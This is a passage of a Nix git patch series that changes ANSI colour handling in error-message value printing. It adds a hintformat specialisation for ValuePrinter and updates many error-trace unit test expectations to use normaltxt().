+ "«error: uh oh!»" ANSI_NORMAL, PrintOptions { .ansiColors = true, @@ -501,19 +489,7 @@ TEST_F(ValuePrintingTests, ansiColorsDerivationError) test(vAttrs, "{ drvPath = " ANSI_RED - "«" - ANSI_RED - "error:" - ANSI_NORMAL - "\n … while calling the '" - ANSI_MAGENTA - "throw" - ANSI_NORMAL - "' builtin\n\n " - ANSI_RED - "error:" - ANSI_NORMAL - " uh oh!»" + "«error: uh oh!»" ANSI_NORMAL "; type = " ANSI_MAGENTA @@ -527,19 +503,7 @@ TEST_F(ValuePrintingTests, ansiColorsDerivationError) test(vAttrs, ANSI_RED - "«" - ANSI_RED - "error:" - ANSI_NORMAL - "\n … while calling the '" - ANSI_MAGENTA - "throw" - ANSI_NORMAL - "' builtin\n\n " - ANSI_RED - "error:" - ANSI_NORMAL - " uh oh!»" + "«error: uh oh!»" ANSI_NORMAL, PrintOptions { .ansiColors = true, @@ -560,7 +524,7 @@ TEST_F(ValuePrintingTests, ansiColorsAssert) state.mkThunk_(v, &expr); test(v, - ANSI_RED "«" ANSI_RED "error:" ANSI_NORMAL " assertion '" ANSI_MAGENTA "false" ANSI_NORMAL "' failed»" ANSI_NORMAL, + ANSI_RED "«error: 
assertion 'false' failed»" ANSI_NORMAL, PrintOptions { .ansiColors = true, .force = true From 9646d62b0c3b1313565124a304ddc4057700ab13 Mon Sep 17 00:00:00 2001 From: Rebecca Turner Date: Sat, 3 Feb 2024 19:21:20 -0800 Subject: [PATCH 391/654] Don't print values in magenta This fixes the opening bracket of lists/attrsets being printed in magenta, unlike the closing bracket. https://github.com/NixOS/nix/pull/9753#issuecomment-1904616088 --- src/libexpr/print.cc | 7 + src/libexpr/print.hh | 10 ++ tests/unit/libexpr/error_traces.cc | 228 ++++++++++++++--------------- 3 files changed, 131 insertions(+), 114 deletions(-) diff --git a/src/libexpr/print.cc b/src/libexpr/print.cc index 702e4bfe8..277c454d7 100644 --- a/src/libexpr/print.cc +++ b/src/libexpr/print.cc @@ -511,4 +511,11 @@ std::ostream & operator<<(std::ostream & output, const ValuePrinter & printer) return output; } +template<> +hintformat & hintformat::operator%(const ValuePrinter & value) +{ + fmt % value; + return *this; +} + } diff --git a/src/libexpr/print.hh b/src/libexpr/print.hh index a8300264a..a542bc7b1 100644 --- a/src/libexpr/print.hh +++ b/src/libexpr/print.hh @@ -9,6 +9,7 @@ #include +#include "fmt.hh" #include "print-options.hh" namespace nix { @@ -78,4 +79,13 @@ public: }; std::ostream & operator<<(std::ostream & output, const ValuePrinter & printer); + + +/** + * `ValuePrinter` does its own ANSI formatting, so we don't color it + * magenta. 
+ */ +template<> +hintformat & hintformat::operator%(const ValuePrinter & value); + } diff --git a/tests/unit/libexpr/error_traces.cc b/tests/unit/libexpr/error_traces.cc index 5fca79304..2f4c9e60d 100644 --- a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -105,7 +105,7 @@ namespace nix { TEST_F(ErrorTraceTest, genericClosure) { ASSERT_TRACE2("genericClosure 1", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.genericClosure")); ASSERT_TRACE2("genericClosure {}", @@ -115,22 +115,22 @@ namespace nix { ASSERT_TRACE2("genericClosure { startSet = 1; }", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the 'startSet' attribute passed as argument to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = true; }", TypeError, - hintfmt("expected a function but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), hintfmt("while evaluating the 'operator' attribute passed as argument to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: true; }", TypeError, - hintfmt("expected a list but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), hintfmt("while evaluating the return value of the `operator` passed to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: [ true ]; }", TypeError, - hintfmt("expected a 
set but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), hintfmt("while evaluating one of the elements generated by (or initially passed to) builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: [ {} ]; }", @@ -145,7 +145,7 @@ namespace nix { ASSERT_TRACE2("genericClosure { startSet = [ true ]; operator = item: [{ key = ''a''; }]; }", TypeError, - hintfmt("expected a set but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), hintfmt("while evaluating one of the elements generated by (or initially passed to) builtins.genericClosure")); } @@ -154,12 +154,12 @@ namespace nix { TEST_F(ErrorTraceTest, replaceStrings) { ASSERT_TRACE2("replaceStrings 0 0 {}", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "0" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "0" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [] 0 {}", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "0" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "0" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.replaceStrings")); ASSERT_TRACE1("replaceStrings [ 0 ] [] {}", @@ -168,17 +168,17 @@ namespace nix { ASSERT_TRACE2("replaceStrings [ 1 ] [ \"new\" ] {}", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating one of the strings to replace passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [ 
\"oo\" ] [ true ] \"foo\"", TypeError, - hintfmt("expected a string but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), hintfmt("while evaluating one of the replacement strings passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [ \"old\" ] [ \"new\" ] {}", TypeError, - hintfmt("expected a string but found %s: %s", "a set", "{ }"), + hintfmt("expected a string but found %s: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the third argument passed to builtins.replaceStrings")); } @@ -243,7 +243,7 @@ namespace nix { TEST_F(ErrorTraceTest, ceil) { ASSERT_TRACE2("ceil \"foo\"", TypeError, - hintfmt("expected a float but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a float but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.ceil")); } @@ -252,7 +252,7 @@ namespace nix { TEST_F(ErrorTraceTest, floor) { ASSERT_TRACE2("floor \"foo\"", TypeError, - hintfmt("expected a float but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a float but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.floor")); } @@ -265,7 +265,7 @@ namespace nix { TEST_F(ErrorTraceTest, getEnv) { ASSERT_TRACE2("getEnv [ ]", TypeError, - hintfmt("expected a string but found %s: %s", "a list", "[ ]"), + hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.getEnv")); } @@ -286,7 +286,7 @@ namespace nix { TEST_F(ErrorTraceTest, placeholder) { ASSERT_TRACE2("placeholder []", TypeError, - hintfmt("expected a string but found %s: %s", "a list", "[ ]"), + hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), 
hintfmt("while evaluating the first argument passed to builtins.placeholder")); } @@ -295,7 +295,7 @@ namespace nix { TEST_F(ErrorTraceTest, toPath) { ASSERT_TRACE2("toPath []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), + hintfmt("cannot coerce %s to a string: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.toPath")); ASSERT_TRACE2("toPath \"foo\"", @@ -309,7 +309,7 @@ namespace nix { TEST_F(ErrorTraceTest, storePath) { ASSERT_TRACE2("storePath true", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), + hintfmt("cannot coerce %s to a string: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to 'builtins.storePath'")); } @@ -318,7 +318,7 @@ namespace nix { TEST_F(ErrorTraceTest, pathExists) { ASSERT_TRACE2("pathExists []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), + hintfmt("cannot coerce %s to a string: %s", "a list", normaltxt("[ ]")), hintfmt("while realising the context of a path")); ASSERT_TRACE2("pathExists \"zorglub\"", @@ -332,7 +332,7 @@ namespace nix { TEST_F(ErrorTraceTest, baseNameOf) { ASSERT_TRACE2("baseNameOf []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), + hintfmt("cannot coerce %s to a string: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.baseNameOf")); } @@ -377,7 +377,7 @@ namespace nix { TEST_F(ErrorTraceTest, filterSource) { ASSERT_TRACE2("filterSource [] []", TypeError, - hintfmt("cannot coerce %s to a string: %s", "a list", "[ ]"), + hintfmt("cannot coerce %s to a string: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the second argument (the path to filter) passed to 'builtins.filterSource'")); ASSERT_TRACE2("filterSource [] \"foo\"", @@ -387,7 +387,7 @@ namespace nix { ASSERT_TRACE2("filterSource [] ./.", TypeError, - 
hintfmt("expected a function but found %s: %s", "a list", "[ ]"), + hintfmt("expected a function but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.filterSource")); // Usupported by store "dummy" @@ -412,7 +412,7 @@ namespace nix { TEST_F(ErrorTraceTest, attrNames) { ASSERT_TRACE2("attrNames []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", "[ ]"), + hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the argument passed to builtins.attrNames")); } @@ -421,7 +421,7 @@ namespace nix { TEST_F(ErrorTraceTest, attrValues) { ASSERT_TRACE2("attrValues []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", "[ ]"), + hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the argument passed to builtins.attrValues")); } @@ -430,12 +430,12 @@ namespace nix { TEST_F(ErrorTraceTest, getAttr) { ASSERT_TRACE2("getAttr [] []", TypeError, - hintfmt("expected a string but found %s: %s", "a list", "[ ]"), + hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.getAttr")); ASSERT_TRACE2("getAttr \"foo\" []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", "[ ]"), + hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the second argument passed to builtins.getAttr")); ASSERT_TRACE2("getAttr \"foo\" {}", @@ -453,12 +453,12 @@ namespace nix { TEST_F(ErrorTraceTest, hasAttr) { ASSERT_TRACE2("hasAttr [] []", TypeError, - hintfmt("expected a string but found %s: %s", "a list", "[ ]"), + hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.hasAttr")); ASSERT_TRACE2("hasAttr \"foo\" []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", "[ ]"), + 
hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the second argument passed to builtins.hasAttr")); } @@ -471,17 +471,17 @@ namespace nix { TEST_F(ErrorTraceTest, removeAttrs) { ASSERT_TRACE2("removeAttrs \"\" \"\"", TypeError, - hintfmt("expected a set but found %s: %s", "a string", ANSI_MAGENTA "\"\"" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); ASSERT_TRACE2("removeAttrs \"\" [ 1 ]", TypeError, - hintfmt("expected a set but found %s: %s", "a string", ANSI_MAGENTA "\"\"" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); ASSERT_TRACE2("removeAttrs \"\" [ \"1\" ]", TypeError, - hintfmt("expected a set but found %s: %s", "a string", ANSI_MAGENTA "\"\"" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); } @@ -490,12 +490,12 @@ namespace nix { TEST_F(ErrorTraceTest, listToAttrs) { ASSERT_TRACE2("listToAttrs 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the argument passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ 1 ]", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating an element of the list passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ {} ]", @@ -505,7 +505,7 @@ namespace nix { ASSERT_TRACE2("listToAttrs [ 
{ name = 1; } ]", TypeError, - hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a string but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the `name` attribute of an element of the list passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ { name = \"foo\"; } ]", @@ -519,12 +519,12 @@ namespace nix { TEST_F(ErrorTraceTest, intersectAttrs) { ASSERT_TRACE2("intersectAttrs [] []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", "[ ]"), + hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.intersectAttrs")); ASSERT_TRACE2("intersectAttrs {} []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", "[ ]"), + hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the second argument passed to builtins.intersectAttrs")); } @@ -533,22 +533,22 @@ namespace nix { TEST_F(ErrorTraceTest, catAttrs) { ASSERT_TRACE2("catAttrs [] {}", TypeError, - hintfmt("expected a string but found %s: %s", "a list", "[ ]"), + hintfmt("expected a string but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" {}", TypeError, - hintfmt("expected a list but found %s: %s", "a set", "{ }"), + hintfmt("expected a list but found %s: %s", "a set", normaltxt("{ }")), hintfmt("while evaluating the second argument passed to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" [ 1 ]", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating an element in the list passed as second argument to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" [ { foo = 1; } 1 { bar = 5;} 
]", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating an element in the list passed as second argument to builtins.catAttrs")); } @@ -565,7 +565,7 @@ namespace nix { TEST_F(ErrorTraceTest, mapAttrs) { ASSERT_TRACE2("mapAttrs [] []", TypeError, - hintfmt("expected a set but found %s: %s", "a list", "[ ]"), + hintfmt("expected a set but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the second argument passed to builtins.mapAttrs")); // XXX: defered @@ -590,12 +590,12 @@ namespace nix { TEST_F(ErrorTraceTest, zipAttrsWith) { ASSERT_TRACE2("zipAttrsWith [] [ 1 ]", TypeError, - hintfmt("expected a function but found %s: %s", "a list", "[ ]"), + hintfmt("expected a function but found %s: %s", "a list", normaltxt("[ ]")), hintfmt("while evaluating the first argument passed to builtins.zipAttrsWith")); ASSERT_TRACE2("zipAttrsWith (_: 1) [ 1 ]", TypeError, - hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a set but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating a value of the list passed as second argument to builtins.zipAttrsWith")); // XXX: How to properly tell that the fucntion takes two arguments ? 
@@ -622,7 +622,7 @@ namespace nix { TEST_F(ErrorTraceTest, elemAt) { ASSERT_TRACE2("elemAt \"foo\" (-1)", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.elemAt")); ASSERT_TRACE1("elemAt [] (-1)", @@ -639,7 +639,7 @@ namespace nix { TEST_F(ErrorTraceTest, head) { ASSERT_TRACE2("head 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.elemAt")); ASSERT_TRACE1("head []", @@ -652,7 +652,7 @@ namespace nix { TEST_F(ErrorTraceTest, tail) { ASSERT_TRACE2("tail 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.tail")); ASSERT_TRACE1("tail []", @@ -665,12 +665,12 @@ namespace nix { TEST_F(ErrorTraceTest, map) { ASSERT_TRACE2("map 1 \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.map")); ASSERT_TRACE2("map 1 [ 1 ]", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.map")); } @@ -679,17 +679,17 @@ namespace nix { TEST_F(ErrorTraceTest, filter) { ASSERT_TRACE2("filter 1 \"foo\"", 
TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.filter")); ASSERT_TRACE2("filter 1 [ \"foo\" ]", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.filter")); ASSERT_TRACE2("filter (_: 5) [ \"foo\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "5" ANSI_NORMAL), + hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "5" ANSI_NORMAL)), hintfmt("while evaluating the return value of the filtering function passed to builtins.filter")); } @@ -698,7 +698,7 @@ namespace nix { TEST_F(ErrorTraceTest, elem) { ASSERT_TRACE2("elem 1 \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.elem")); } @@ -707,17 +707,17 @@ namespace nix { TEST_F(ErrorTraceTest, concatLists) { ASSERT_TRACE2("concatLists 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.concatLists")); ASSERT_TRACE2("concatLists [ 1 ]", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating a value of 
the list passed to builtins.concatLists")); ASSERT_TRACE2("concatLists [ [1] \"foo\" ]", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating a value of the list passed to builtins.concatLists")); } @@ -726,12 +726,12 @@ namespace nix { TEST_F(ErrorTraceTest, length) { ASSERT_TRACE2("length 1", TypeError, - hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.length")); ASSERT_TRACE2("length \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.length")); } @@ -740,21 +740,21 @@ namespace nix { TEST_F(ErrorTraceTest, foldlPrime) { ASSERT_TRACE2("foldl' 1 \"foo\" true", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.foldlStrict")); ASSERT_TRACE2("foldl' (_: 1) \"foo\" true", TypeError, - hintfmt("expected a list but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a Boolean", normaltxt(ANSI_CYAN "true" ANSI_NORMAL)), hintfmt("while evaluating the third argument passed to builtins.foldlStrict")); ASSERT_TRACE1("foldl' (_: 1) \"foo\" [ true ]", TypeError, - hintfmt("attempt to call something which is not a function but %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL)); + hintfmt("attempt to 
call something which is not a function but %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL))); ASSERT_TRACE2("foldl' (a: b: a && b) \"foo\" [ true ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a Boolean but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("in the left operand of the AND (&&) operator")); } @@ -763,17 +763,17 @@ namespace nix { TEST_F(ErrorTraceTest, any) { ASSERT_TRACE2("any 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.any")); ASSERT_TRACE2("any (_: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.any")); ASSERT_TRACE2("any (_: 1) [ \"foo\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the return value of the function passed to builtins.any")); } @@ -782,17 +782,17 @@ namespace nix { TEST_F(ErrorTraceTest, all) { ASSERT_TRACE2("all 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.all")); ASSERT_TRACE2("all (_: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + 
hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.all")); ASSERT_TRACE2("all (_: 1) [ \"foo\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the return value of the function passed to builtins.all")); } @@ -801,12 +801,12 @@ namespace nix { TEST_F(ErrorTraceTest, genList) { ASSERT_TRACE2("genList 1 \"foo\"", TypeError, - hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected an integer but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.genList")); ASSERT_TRACE2("genList 1 2", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.genList", "an integer")); // XXX: defered @@ -825,21 +825,21 @@ namespace nix { TEST_F(ErrorTraceTest, sort) { ASSERT_TRACE2("sort 1 \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" ANSI_NORMAL)), hintfmt("while evaluating the second argument passed to builtins.sort")); ASSERT_TRACE2("sort 1 [ \"foo\" ]", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.sort")); ASSERT_TRACE1("sort (_: 1) [ \"foo\" 
\"bar\" ]", TypeError, - hintfmt("attempt to call something which is not a function but %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL)); + hintfmt("attempt to call something which is not a function but %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL))); ASSERT_TRACE2("sort (_: _: 1) [ \"foo\" \"bar\" ]", TypeError, - hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a Boolean but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the return value of the sorting function passed to builtins.sort")); // XXX: Trace too deep, need better asserts @@ -857,17 +857,17 @@ namespace nix { TEST_F(ErrorTraceTest, partition) { ASSERT_TRACE2("partition 1 \"foo\"", TypeError, - hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), + hintfmt("expected a function but found %s: %s", "an integer", normaltxt(ANSI_CYAN "1" ANSI_NORMAL)), hintfmt("while evaluating the first argument passed to builtins.partition")); ASSERT_TRACE2("partition (_: 1) \"foo\"", TypeError, - hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), + hintfmt("expected a list but found %s: %s", "a string", normaltxt(ANSI_MAGENTA "\"foo\"" 